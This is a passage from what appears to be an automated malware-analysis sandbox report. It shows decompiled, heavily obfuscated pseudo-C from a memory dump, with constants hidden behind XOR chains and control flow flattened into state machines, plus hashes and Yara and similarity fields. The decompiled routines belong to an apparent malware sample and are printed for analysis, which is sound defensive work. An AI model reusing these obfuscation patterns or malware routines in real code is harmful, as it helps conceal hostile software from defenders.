                                                      				_v260 = _v260 ^ 0x00083ddd;
                                                      				_v164 = 0x49a7;
                                                      				_t514 = 0x7b;
                                                      				_t462 = 0x17;
                                                      				_v164 = _v164 * 0x76;
                                                      				_v164 = _v164 ^ 0x002193f4;
                                                      				_v300 = 0x59a2;
                                                      				_v300 = _v300 ^ 0x3b27ac73;
                                                      				_v300 = _v300 + 0xffff6ec5;
                                                      				_v300 = _v300 + 0xffffb5fd;
                                                      				_v300 = _v300 ^ 0x3b271e50;
                                                      				_v252 = 0xb9af;
                                                      				_v252 = _v252 >> 8;
                                                      				_v252 = _v252 + 0xffffa108;
                                                      				_v252 = _v252 ^ 0xfffffedf;
                                                      				_v196 = 0x7b72;
                                                      				_v196 = _v196 << 2;
                                                      				_v196 = _v196 ^ 0x0001e8b2;
                                                      				_v272 = 0x250d;
                                                      				_v272 = _v272 * 0x16;
                                                      				_v272 = _v272 >> 3;
                                                      				_v272 = _v272 / _t514;
                                                      				_v272 = _v272 ^ 0x0000021c;
                                                      				_v156 = 0x4ea8;
                                                      				_v156 = _v156 + 0xffff8c10;
                                                      				_v156 = _v156 ^ 0xffffc687;
                                                      				_v292 = 0x9a7d;
                                                      				_v292 = _v292 << 1;
                                                      				_v292 = _v292 / _t462;
                                                      				_v292 = _v292 | 0x2e5edf0a;
                                                      				_v292 = _v292 ^ 0x2e5e89f7;
                                                      				_v236 = 0x69d3;
                                                      				_t515 = 0x5a;
                                                      				_v236 = _v236 / _t515;
                                                      				_v236 = _v236 >> 0xf;
                                                      				_v236 = _v236 ^ 0x000046bd;
                                                      				_v268 = 0x8cb9;
                                                      				_v268 = _v268 + 0xffff2c59;
                                                      				_v268 = _v268 << 4;
                                                      				_v268 = _v268 << 2;
                                                      				_v268 = _v268 ^ 0xffee6fc7;
                                                      				_v284 = 0x8a1;
                                                      				_v284 = _v284 ^ 0x358a3729;
                                                      				_v284 = _v284 << 4;
                                                      				_v284 = _v284 + 0xde3b;
                                                      				_v284 = _v284 ^ 0x58a4aa69;
                                                      				_v264 = 0x360c;
                                                      				_v264 = _v264 ^ 0xc2d2005c;
                                                      				_v264 = _v264 << 6;
                                                      				_t516 = 0x32;
                                                      				_v264 = _v264 * 0x5c;
                                                      				_v264 = _v264 ^ 0xe2e17670;
                                                      				_v180 = 0x8be;
                                                      				_v180 = _v180 | 0xafaf70c7;
                                                      				_v180 = _v180 ^ 0xafaf5d0a;
                                                      				_v168 = 0x59fe;
                                                      				_v168 = _v168 << 0xd;
                                                      				_v168 = _v168 ^ 0x0b3f82ad;
                                                      				_v188 = 0x197e;
                                                      				_v188 = _v188 << 4;
                                                      				_v188 = _v188 ^ 0x0001c80c;
                                                      				_v256 = 0x542a;
                                                      				_v256 = _v256 + 0x92cc;
                                                      				_v256 = _v256 | 0xa238a407;
                                                      				_v256 = _v256 ^ 0xa2389846;
                                                      				_v224 = 0x7627;
                                                      				_v224 = _v224 + 0xdff4;
                                                      				_v224 = _v224 ^ 0x000122df;
                                                      				_v316 = 0x3ece;
                                                      				_v316 = _v316 * 0x74;
                                                      				_v316 = _v316 >> 8;
                                                      				_v316 = _v316 | 0xc6a89cdb;
                                                      				_v316 = _v316 ^ 0xc6a8f635;
                                                      				_v244 = 0x10d9;
                                                      				_v244 = _v244 | 0xf517e732;
                                                      				_v244 = _v244 + 0x5e6f;
                                                      				_v244 = _v244 ^ 0xf518070f;
                                                      				_v160 = 0xb68b;
                                                      				_v160 = _v160 >> 7;
                                                      				_v160 = _v160 ^ 0x00003a74;
                                                      				_v276 = 0x3579;
                                                      				_v276 = _v276 | 0x431a7672;
                                                      				_v276 = _v276 << 2;
                                                      				_v276 = _v276 / _t516;
                                                      				_v276 = _v276 ^ 0x003ff326;
                                                      				_v216 = 0xcfb7;
                                                      				_t517 = 0x63;
                                                      				_v216 = _v216 / _t517;
                                                      				_v216 = _v216 ^ 0x00003917;
                                                      				_v312 = 0xd3b7;
                                                      				_v312 = _v312 ^ 0x43b1e200;
                                                      				_v312 = _v312 << 8;
                                                      				_t518 = 0x70;
                                                      				_v312 = _v312 / _t518;
                                                      				_v312 = _v312 ^ 0x01952af0;
                                                      				_v248 = 0xe683;
                                                      				_v248 = _v248 | 0xeb182d0f;
                                                      				_v248 = _v248 + 0xcf0c;
                                                      				_v248 = _v248 ^ 0xeb19e4ec;
                                                      				_v204 = 0xada2;
                                                      				_v204 = _v204 >> 0x10;
                                                      				_v204 = _v204 ^ 0x000009df;
                                                      				_v152 = 0xb32a;
                                                      				_v152 = _v152 + 0xffff4f9d;
                                                      				_v152 = _v152 ^ 0x00004085;
                                                      				_v212 = 0xbe4c;
                                                      				_t531 = _a4;
                                                      				_v212 = _v212 * 5;
                                                      				_v212 = _v212 ^ 0x00039e07;
                                                      				_v280 = 0xc7f7;
                                                      				_v280 = _v280 | 0xad7c9e6f;
                                                      				_v280 = _v280 * 0x1c;
                                                      				_v280 = _v280 | 0xde3ec68b;
                                                      				_v280 = _v280 ^ 0xffbea491;
                                                      				_v240 = 0x8de7;
                                                      				_v240 = _v240 * 0x45;
                                                      				_t463 = _v140;
                                                      				_v240 = _v240 / _t462;
                                                      				_v240 = _v240 ^ 0x00019f2b;
                                                      				_v304 = 0x16f;
                                                      				_v304 = _v304 | 0xdf403998;
                                                      				_v304 = _v304 ^ 0x6a41af55;
                                                      				_v304 = _v304 | 0x5f7c1de9;
                                                      				_v304 = _v304 ^ 0xff7dd65d;
                                                      				_v208 = 0xa25a;
                                                      				_v208 = _v208 / _t518;
                                                      				_v208 = _v208 ^ 0x00007fd0;
                                                      				_v184 = 0x444f;
                                                      				_t519 = 0x26;
                                                      				_v184 = _v184 * 0x7d;
                                                      				_v184 = _v184 ^ 0x002171af;
                                                      				_v192 = 0x6191;
                                                      				_v192 = _v192 << 6;
                                                      				_v192 = _v192 ^ 0x00185c0b;
                                                      				_v200 = 0x9864;
                                                      				_v200 = _v200 / _t519;
                                                      				_v200 = _v200 ^ 0x0000693d;
                                                      				_v232 = 0xae1;
                                                      				_v232 = _v232 ^ 0x7986b26b;
                                                      				_t520 = 0x49;
                                                      				_t521 = _v140;
                                                      				_v232 = _v232 / _t520;
                                                      				_v232 = _v232 ^ 0x01aa59fa;
                                                      				_v176 = 0xf7eb;
                                                      				_v176 = _v176 * 0x67;
                                                      				_v176 = _v176 ^ 0x0063e620;
                                                      				_v296 = 0x2b09;
                                                      				_v296 = _v296 + 0xffffdaa4;
                                                      				_v296 = _v296 | 0x1659e70b;
                                                      				_v296 = _v296 ^ 0x3abae7e6;
                                                      				_v296 = _v296 ^ 0x2ce32170;
                                                      				while(_t522 != 0xa551406) {
                                                      					if(_t522 == 0x10f51287) {
                                                      						E00242674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
                                                      						_t466 = _v144;
                                                      						_t532 =  &(_t532[5]);
                                                      						_t522 = 0x3013e9c6;
                                                      						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
                                                      						continue;
                                                      					}
                                                      					if(_t522 == 0x14284095) {
                                                      						_t522 = 0x28f75045;
                                                      						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
                                                      						continue;
                                                      					}
                                                      					if(_t522 == 0x1b8692db) {
                                                      						_v148 = E00248C8F(_t466);
                                                      						_t522 = 0x14284095;
                                                      						L10:
                                                      						_t466 = _v144;
                                                      						continue;
                                                      					}
                                                      					if(_t522 == 0x28f75045) {
                                                      						_push(_t466);
                                                      						_push(_t466);
                                                      						_t521 = E00238736(_a4);
                                                      						 *_t531 = _t521;
                                                      						__eflags = _t521;
                                                      						if(_t521 == 0) {
                                                      							L16:
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      						_t522 = 0xa551406;
                                                      						_t463 = _a4 + _t521;
                                                      						__eflags = _a4 + _t521;
                                                      						goto L10;
                                                      					}
                                                      					_t541 = _t522 - 0x3013e9c6;
                                                      					if(_t522 != 0x3013e9c6) {
                                                      						L15:
                                                      						__eflags = _t522 - 0x28249ddd;
                                                      						if(__eflags != 0) {
                                                      							continue;
                                                      						}
                                                      						goto L16;
                                                      					}
                                                      					_push(0x24c7a0);
                                                      					_push(_v208);
                                                      					E00237F4B(_t521, E0024878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
                                                      					E00242025(_v232, _t457, _v176, _v296);
                                                      					return 1;
                                                      				}
                                                      				_t525 = (E0023EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
                                                      				E0023B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
                                                      				_t373 =  &_v292; // 0xe2e17670
                                                      				 *((char*)(_t532 + _t525 + 0x130)) = 0;
                                                      				_t528 = (E0023EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
                                                      				E0023B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
                                                      				_push(0x24c710);
                                                      				_push(_v188);
                                                      				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
                                                      				_t521 = _t521 + E002311C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0024878F(_v180, _v168, __eflags), _v276);
                                                      				__eflags = _t521;
                                                      				E00242025(_v216, _t440, _v312, _v248);
                                                      				_t466 = _v144;
                                                      				_t532 =  &(_t532[0x1c]);
                                                      				_t522 = 0x10f51287;
                                                      				goto L15;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                                      • API String ID: 0-2620103065
                                                      • Opcode ID: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
                                                      • Instruction ID: 618da252c70ab019f5b47d86f838cc0a577455b003744142f3b1ac404a88b6d4
                                                      • Opcode Fuzzy Hash: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
                                                      • Instruction Fuzzy Hash: 04222371508380DFE368CF25C58AA8BFBE1BBC4748F108A1DE5D9962A1D7B58949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00234A35(intOrPtr __ecx, signed int __edx) {
                                                      				char _v524;
                                                      				char _v1044;
                                                      				char _v1564;
                                                      				intOrPtr _v1568;
                                                      				intOrPtr _v1572;
                                                      				char _v1576;
                                                      				intOrPtr _v1580;
                                                      				char _v1584;
                                                      				intOrPtr _v1588;
                                                      				signed int _v1592;
                                                      				signed int _v1596;
                                                      				signed int _v1600;
                                                      				signed int _v1604;
                                                      				signed int _v1608;
                                                      				signed int _v1612;
                                                      				signed int _v1616;
                                                      				signed int _v1620;
                                                      				signed int _v1624;
                                                      				signed int _v1628;
                                                      				signed int _v1632;
                                                      				unsigned int _v1636;
                                                      				signed int _v1640;
                                                      				signed int _v1644;
                                                      				signed int _v1648;
                                                      				signed int _v1652;
                                                      				signed int _v1656;
                                                      				signed int _v1660;
                                                      				signed int _v1664;
                                                      				signed int _v1668;
                                                      				signed int _v1672;
                                                      				signed int _v1676;
                                                      				signed int _v1680;
                                                      				signed int _v1684;
                                                      				signed int _v1688;
                                                      				signed int _v1692;
                                                      				signed int _v1696;
                                                      				signed int _v1700;
                                                      				signed int _v1704;
                                                      				signed int _v1708;
                                                      				signed int _v1712;
                                                      				signed int _v1716;
                                                      				signed int _v1720;
                                                      				signed int _v1724;
                                                      				signed int _v1728;
                                                      				signed int _v1732;
                                                      				signed int _v1736;
                                                      				signed int _v1740;
                                                      				signed int _v1744;
                                                      				signed int _v1748;
                                                      				signed int _v1752;
                                                      				signed int _v1756;
                                                      				signed int _v1760;
                                                      				signed int _v1764;
                                                      				signed int _v1768;
                                                      				signed int _v1772;
                                                      				signed int _v1776;
                                                      				signed int _v1780;
                                                      				signed int _v1784;
                                                      				signed int _v1788;
                                                      				signed int _v1792;
                                                      				signed int _v1796;
                                                      				signed int _v1800;
                                                      				void* _t474;
                                                      				void* _t475;
                                                      				signed int _t479;
                                                      				signed int _t491;
                                                      				signed int _t496;
                                                      				signed int _t500;
                                                      				signed int _t510;
                                                      				signed int _t511;
                                                      				signed int _t512;
                                                      				signed int _t513;
                                                      				signed int _t514;
                                                      				signed int _t515;
                                                      				void* _t520;
                                                      				signed int _t524;
                                                      				void* _t530;
                                                      				void* _t532;
                                                      				signed int _t572;
                                                      				signed int _t573;
                                                      				signed int _t574;
                                                      				signed int _t575;
                                                      				void* _t579;
                                                      				void* _t580;
                                                      				void* _t582;
                                                      
                                                      				_v1628 = 0xed3;
                                                      				_v1628 = _v1628 + 0xd002;
                                                      				_v1628 = _v1628 ^ 0x0000defc;
                                                      				_v1796 = 0x50e8;
                                                      				_v1796 = _v1796 + 0xffffea13;
                                                      				_v1796 = _v1796 >> 0xe;
                                                      				_v1796 = _v1796 ^ 0x3dc2eaa9;
                                                      				_v1796 = _v1796 ^ 0x3dc2b05a;
                                                      				_v1604 = 0xecd0;
                                                      				_v1604 = _v1604 << 0xd;
                                                      				_v1604 = _v1604 ^ 0x1d9a54ec;
                                                      				_v1636 = 0xad8d;
                                                      				_v1636 = _v1636 >> 0xc;
                                                      				_v1636 = _v1636 ^ 0x000019e2;
                                                      				_v1600 = 0x1846;
                                                      				_v1592 = __edx;
                                                      				_t574 = 0x4762904;
                                                      				_v1588 = __ecx;
                                                      				_t510 = 0x63;
                                                      				_v1600 = _v1600 / _t510;
                                                      				_v1600 = _v1600 ^ 0x00006484;
                                                      				_v1740 = 0xfd34;
                                                      				_v1740 = _v1740 ^ 0x1b9865fd;
                                                      				_v1740 = _v1740 ^ 0xced01448;
                                                      				_v1740 = _v1740 ^ 0xd548e885;
                                                      				_v1684 = 0x582a;
                                                      				_t572 = 0x3b;
                                                      				_v1684 = _v1684 / _t572;
                                                      				_v1684 = _v1684 ^ 0x000016a0;
                                                      				_v1724 = 0x2b60;
                                                      				_t511 = 0x34;
                                                      				_v1724 = _v1724 / _t511;
                                                      				_v1724 = _v1724 ^ 0xf4396e09;
                                                      				_v1724 = _v1724 ^ 0xf4397db5;
                                                      				_v1732 = 0x220f;
                                                      				_v1732 = _v1732 ^ 0x234d952a;
                                                      				_v1732 = _v1732 >> 1;
                                                      				_v1732 = _v1732 ^ 0x11a6b27c;
                                                      				_v1616 = 0x4d57;
                                                      				_v1616 = _v1616 << 0xb;
                                                      				_v1616 = _v1616 ^ 0x026acda8;
                                                      				_v1672 = 0x3d68;
                                                      				_v1672 = _v1672 + 0xffff611f;
                                                      				_v1672 = _v1672 ^ 0xffff811c;
                                                      				_v1800 = 0xf339;
                                                      				_v1800 = _v1800 + 0xfffff0f7;
                                                      				_v1800 = _v1800 + 0x895c;
                                                      				_v1800 = _v1800 + 0xc572;
                                                      				_v1800 = _v1800 ^ 0x000271c2;
                                                      				_v1664 = 0x37c5;
                                                      				_v1664 = _v1664 + 0xffffa7ba;
                                                      				_v1664 = _v1664 ^ 0xffffa1b5;
                                                      				_v1632 = 0xc51c;
                                                      				_v1632 = _v1632 >> 4;
                                                      				_v1632 = _v1632 ^ 0x00001093;
                                                      				_v1640 = 0x76f9;
                                                      				_v1640 = _v1640 ^ 0x9fffdcc0;
                                                      				_v1640 = _v1640 ^ 0x9fff82e4;
                                                      				_v1648 = 0x8076;
                                                      				_v1648 = _v1648 * 7;
                                                      				_v1648 = _v1648 ^ 0x0003a5e4;
                                                      				_v1708 = 0x21bc;
                                                      				_v1708 = _v1708 + 0xc05f;
                                                      				_v1708 = _v1708 << 6;
                                                      				_v1708 = _v1708 ^ 0x0038a40f;
                                                      				_v1784 = 0xa89a;
                                                      				_v1784 = _v1784 / _t572;
                                                      				_v1784 = _v1784 + 0xffffeb30;
                                                      				_v1784 = _v1784 << 0xa;
                                                      				_v1784 = _v1784 ^ 0xffb86208;
                                                      				_v1656 = 0x5b43;
                                                      				_v1656 = _v1656 ^ 0xe62d1ba2;
                                                      				_v1656 = _v1656 ^ 0xe62d5436;
                                                      				_v1792 = 0x5d3e;
                                                      				_v1792 = _v1792 >> 5;
                                                      				_v1792 = _v1792 + 0xfffff433;
                                                      				_v1792 = _v1792 ^ 0x1afa5a2f;
                                                      				_v1792 = _v1792 ^ 0xe50594ef;
                                                      				_v1680 = 0x9f3f;
                                                      				_v1680 = _v1680 + 0xfffff3b1;
                                                      				_v1680 = _v1680 ^ 0x0000dcc5;
                                                      				_v1780 = 0x8a4e;
                                                      				_v1780 = _v1780 >> 0xc;
                                                      				_v1780 = _v1780 + 0x10e4;
                                                      				_v1780 = _v1780 ^ 0x817594c9;
                                                      				_v1780 = _v1780 ^ 0x81758ecd;
                                                      				_v1748 = 0xbeb1;
                                                      				_v1748 = _v1748 | 0x408b0c07;
                                                      				_v1748 = _v1748 + 0xffff7379;
                                                      				_v1748 = _v1748 ^ 0x408b5cad;
                                                      				_v1752 = 0xb76f;
                                                      				_v1752 = _v1752 >> 0xe;
                                                      				_t512 = 0x23;
                                                      				_v1752 = _v1752 / _t512;
                                                      				_v1752 = _v1752 ^ 0x000011f4;
                                                      				_v1652 = 0x783b;
                                                      				_v1652 = _v1652 ^ 0xf6ea495a;
                                                      				_v1652 = _v1652 ^ 0xf6ea4537;
                                                      				_v1788 = 0x701e;
                                                      				_v1788 = _v1788 | 0x54ae9efd;
                                                      				_v1788 = _v1788 >> 0xa;
                                                      				_v1788 = _v1788 + 0x818c;
                                                      				_v1788 = _v1788 ^ 0x0015b45a;
                                                      				_v1756 = 0xfc95;
                                                      				_t513 = 0x4e;
                                                      				_v1756 = _v1756 / _t513;
                                                      				_v1756 = _v1756 | 0x6e3e6587;
                                                      				_v1756 = _v1756 ^ 0x6e3e48c8;
                                                      				_v1720 = 0xc52f;
                                                      				_v1720 = _v1720 >> 5;
                                                      				_v1720 = _v1720 << 2;
                                                      				_v1720 = _v1720 ^ 0x00007c98;
                                                      				_v1620 = 0xf570;
                                                      				_v1620 = _v1620 >> 0xa;
                                                      				_v1620 = _v1620 ^ 0x00006ca8;
                                                      				_v1712 = 0x65f6;
                                                      				_v1712 = _v1712 | 0x8fa1cc9c;
                                                      				_v1712 = _v1712 >> 9;
                                                      				_v1712 = _v1712 ^ 0x0047fc5c;
                                                      				_v1676 = 0xb942;
                                                      				_v1676 = _v1676 * 0x15;
                                                      				_v1676 = _v1676 ^ 0x000f4c8d;
                                                      				_v1736 = 0x950a;
                                                      				_v1736 = _v1736 | 0x9f71954d;
                                                      				_v1736 = _v1736 + 0xffff5dd1;
                                                      				_v1736 = _v1736 ^ 0x9f70c3f6;
                                                      				_v1704 = 0xd0f3;
                                                      				_v1704 = _v1704 + 0xffff53c3;
                                                      				_v1704 = _v1704 ^ 0xce9fbdc0;
                                                      				_v1704 = _v1704 ^ 0xce9f87f0;
                                                      				_v1596 = 0x1518;
                                                      				_v1596 = _v1596 + 0x85a2;
                                                      				_v1596 = _v1596 ^ 0x000083d8;
                                                      				_v1668 = 0x64f;
                                                      				_v1668 = _v1668 + 0xffff0b06;
                                                      				_v1668 = _v1668 ^ 0xffff3669;
                                                      				_v1728 = 0x3b1d;
                                                      				_v1728 = _v1728 + 0x874c;
                                                      				_v1728 = _v1728 | 0x620470b3;
                                                      				_v1728 = _v1728 ^ 0x6204e551;
                                                      				_v1696 = 0x2df9;
                                                      				_v1696 = _v1696 << 0xf;
                                                      				_v1696 = _v1696 >> 4;
                                                      				_v1696 = _v1696 ^ 0x016fb4ca;
                                                      				_v1764 = 0xcc6;
                                                      				_v1764 = _v1764 | 0x8d34f989;
                                                      				_t514 = 0x74;
                                                      				_v1764 = _v1764 / _t514;
                                                      				_t515 = 0x18;
                                                      				_v1764 = _v1764 * 0x6c;
                                                      				_v1764 = _v1764 ^ 0x8377a340;
                                                      				_v1608 = 0x20b8;
                                                      				_v1608 = _v1608 + 0xffffe23d;
                                                      				_v1608 = _v1608 ^ 0x000040ba;
                                                      				_v1660 = 0xbd08;
                                                      				_v1660 = _v1660 | 0x92c929d6;
                                                      				_v1660 = _v1660 ^ 0x92c9e2c3;
                                                      				_v1644 = 0x1738;
                                                      				_v1644 = _v1644 + 0x2a2d;
                                                      				_v1644 = _v1644 ^ 0x00007d9b;
                                                      				_v1772 = 0x814c;
                                                      				_v1772 = _v1772 * 0x2f;
                                                      				_v1772 = _v1772 ^ 0x2fd35c8b;
                                                      				_v1772 = _v1772 << 9;
                                                      				_v1772 = _v1772 ^ 0x89c0ce59;
                                                      				_v1612 = 0xaccd;
                                                      				_v1612 = _v1612 << 0xb;
                                                      				_v1612 = _v1612 ^ 0x05662888;
                                                      				_v1624 = 0x6919;
                                                      				_v1624 = _v1624 >> 0xb;
                                                      				_v1624 = _v1624 ^ 0x00005c9e;
                                                      				_v1768 = 0x2455;
                                                      				_v1768 = _v1768 ^ 0xee213c0c;
                                                      				_v1768 = _v1768 + 0xffffdbe3;
                                                      				_v1768 = _v1768 >> 6;
                                                      				_v1768 = _v1768 ^ 0x03b8b908;
                                                      				_v1776 = 0x634b;
                                                      				_v1776 = _v1776 << 3;
                                                      				_v1776 = _v1776 * 0x44;
                                                      				_v1776 = _v1776 + 0xffff5e24;
                                                      				_v1776 = _v1776 ^ 0x00d21830;
                                                      				_v1688 = 0xdff8;
                                                      				_v1688 = _v1688 ^ 0x1c92e1a2;
                                                      				_v1688 = _v1688 ^ 0x1c9257de;
                                                      				_v1744 = 0xd5b6;
                                                      				_v1744 = _v1744 << 7;
                                                      				_v1744 = _v1744 ^ 0x97cdeac8;
                                                      				_v1744 = _v1744 ^ 0x97a72039;
                                                      				_v1692 = 0x89ed;
                                                      				_v1692 = _v1692 + 0xffff6a89;
                                                      				_v1692 = _v1692 | 0xb25fce0e;
                                                      				_v1692 = _v1692 ^ 0xfffff10e;
                                                      				_v1700 = 0xa1e5;
                                                      				_v1700 = _v1700 * 0x2a;
                                                      				_v1700 = _v1700 + 0xffff21dd;
                                                      				_v1700 = _v1700 ^ 0x00199ee5;
                                                      				_v1760 = 0x2165;
                                                      				_v1760 = _v1760 + 0xb9ba;
                                                      				_v1760 = _v1760 / _t515;
                                                      				_v1760 = _v1760 * 0x41;
                                                      				_v1760 = _v1760 ^ 0x000227fb;
                                                      				_v1716 = 0x5b5d;
                                                      				_v1716 = _v1716 | 0x7b7605fc;
                                                      				_v1716 = _v1716 >> 5;
                                                      				_v1716 = _v1716 ^ 0x03cbb2ff;
                                                      				_t474 = E00246D44(_t515);
                                                      				_t573 = _v1592;
                                                      				_t579 = _t474;
                                                      				_t508 = _v1592;
                                                      				while(1) {
                                                      					L1:
                                                      					_t475 = 0x1359b45f;
                                                      					do {
                                                      						while(1) {
                                                      							L2:
                                                      							_t582 = _t574 - 0x1dbe7493;
                                                      							if(_t582 > 0) {
                                                      								break;
                                                      							}
                                                      							if(_t582 == 0) {
                                                      								return E0023F536(_v1692, _v1700, _v1760, _t573);
                                                      							}
                                                      							if(_t574 != 0x4762904) {
                                                      								if(_t574 == 0x589c6e4) {
                                                      									E0023F536(_v1644, _v1772, _v1612, _t508);
                                                      									_pop(_t524);
                                                      									_t574 = 0x1e3f4be6;
                                                      									while(1) {
                                                      										L1:
                                                      										_t475 = 0x1359b45f;
                                                      										goto L2;
                                                      									}
                                                      								} else {
                                                      									if(_t574 == 0xb2e7f16) {
                                                      										_t524 = _v1748;
                                                      										_t500 = E00241773(_v1752, _v1584, _v1580, _v1652, _v1788);
                                                      										_t508 = _t500;
                                                      										_t580 = _t580 + 0x10;
                                                      										__eflags = _t500;
                                                      										_t475 = 0x1359b45f;
                                                      										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
                                                      										continue;
                                                      									} else {
                                                      										if(_t574 == 0xbe4541e) {
                                                      											_push(_t524);
                                                      											_push(_v1660);
                                                      											_push(0);
                                                      											_push(_v1608);
                                                      											_push(0);
                                                      											_push(_v1764);
                                                      											_t524 = _v1696;
                                                      											_push( &_v1564);
                                                      											E0023568E(_t524, 1);
                                                      											_t580 = _t580 + 0x1c;
                                                      											_t574 = 0x589c6e4;
                                                      											while(1) {
                                                      												L1:
                                                      												_t475 = 0x1359b45f;
                                                      												goto L2;
                                                      											}
                                                      										} else {
                                                      											if(_t574 == _t475) {
                                                      												_push(_v1720);
                                                      												E002329E3( &_v524, 0x104, E0024889D(0x24c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
                                                      												_t580 = _t580 + 0x24;
                                                      												E00242025(_v1596, _t503, _v1668, _v1728);
                                                      												_pop(_t524);
                                                      												_t574 = 0xbe4541e;
                                                      												while(1) {
                                                      													L1:
                                                      													_t475 = 0x1359b45f;
                                                      													goto L2;
                                                      												}
                                                      											} else {
                                                      												if(_t574 != 0x1d7e83db) {
                                                      													goto L29;
                                                      												} else {
                                                      													E00244F7D(_v1688, _v1744, _v1576);
                                                      													_pop(_t524);
                                                      													_t574 = 0x3025b1cf;
                                                      													while(1) {
                                                      														L1:
                                                      														_t475 = 0x1359b45f;
                                                      														goto L2;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								L23:
                                                      								return _t496;
                                                      							}
                                                      							_push(_t524);
                                                      							_t530 = 0x38;
                                                      							_t496 = E00238736(_t530);
                                                      							_t573 = _t496;
                                                      							_t532 = _t524;
                                                      							__eflags = _t573;
                                                      							if(_t573 != 0) {
                                                      								_push(_t532);
                                                      								_push(_t532);
                                                      								_t524 = _v1684;
                                                      								E0023C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
                                                      								_t580 = _t580 + 0x1c;
                                                      								_t574 = 0x2d0f1252;
                                                      								while(1) {
                                                      									L1:
                                                      									_t475 = 0x1359b45f;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      						__eflags = _t574 - 0x1e3f4be6;
                                                      						if(_t574 == 0x1e3f4be6) {
                                                      							E0023F536(_v1624, _v1768, _v1776, _v1584);
                                                      							_t574 = 0x1d7e83db;
                                                      							_t475 = 0x1359b45f;
                                                      							goto L29;
                                                      						} else {
                                                      							__eflags = _t574 - 0x20ae1a02;
                                                      							if(_t574 == 0x20ae1a02) {
                                                      								_v1572 = E0024388A();
                                                      								_t479 = E00240ADC(_t478, _v1800, _v1664);
                                                      								_pop(_t520);
                                                      								_v1568 = 2 + _t479 * 2;
                                                      								E0023B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
                                                      								_t580 = _t580 + 0x30;
                                                      								asm("sbb esi, esi");
                                                      								_t575 = _t574 & 0x097497a8;
                                                      								goto L25;
                                                      							} else {
                                                      								__eflags = _t574 - 0x27330c3b;
                                                      								if(_t574 == 0x27330c3b) {
                                                      									E002380BA( &_v1576, _v1680, _v1780,  &_v1584);
                                                      									asm("sbb esi, esi");
                                                      									_pop(_t524);
                                                      									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
                                                      									goto L1;
                                                      								} else {
                                                      									__eflags = _t574 - 0x2d0f1252;
                                                      									if(_t574 == 0x2d0f1252) {
                                                      										_push( &_v524);
                                                      										E002388E5(_v1588, _v1592);
                                                      										asm("sbb esi, esi");
                                                      										_t524 = 0x24c8f0;
                                                      										_t575 = _t574 & 0x02efa56f;
                                                      										__eflags = _t575;
                                                      										L25:
                                                      										_t574 = _t575 + 0x1dbe7493;
                                                      										while(1) {
                                                      											L1:
                                                      											_t475 = 0x1359b45f;
                                                      											goto L2;
                                                      										}
                                                      									} else {
                                                      										__eflags = _t574 - 0x3025b1cf;
                                                      										if(_t574 == 0x3025b1cf) {
                                                      											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
                                                      											_t491 =  *0x24ca24; // 0x0
                                                      											 *(_t573 + 0x2c) = _t491;
                                                      											 *0x24ca24 = _t573;
                                                      											return _t491;
                                                      										}
                                                      										goto L29;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L23;
                                                      						L29:
                                                      						__eflags = _t574 - 0x15e8ba90;
                                                      					} while (__eflags != 0);
                                                      					return _t475;
                                                      				}
                                                      			}

























































































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                                      • API String ID: 0-2931794159
                                                      • Opcode ID: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
                                                      • Instruction ID: 6ac2d1a0878addcab8fd7abec263e0a08a4fa2bd0025a29fd5845bef419dbaab
                                                      • Opcode Fuzzy Hash: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
                                                      • Instruction Fuzzy Hash: E0322371518781CFE3B8CF25C54AA8BBBE1BBC4314F508A1DE5DA962A0D7B59819CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E00238F78(intOrPtr __ecx, intOrPtr __edx) {
                                                      				char _v524;
                                                      				intOrPtr _v536;
                                                      				char _v540;
                                                      				intOrPtr _v544;
                                                      				signed int _v548;
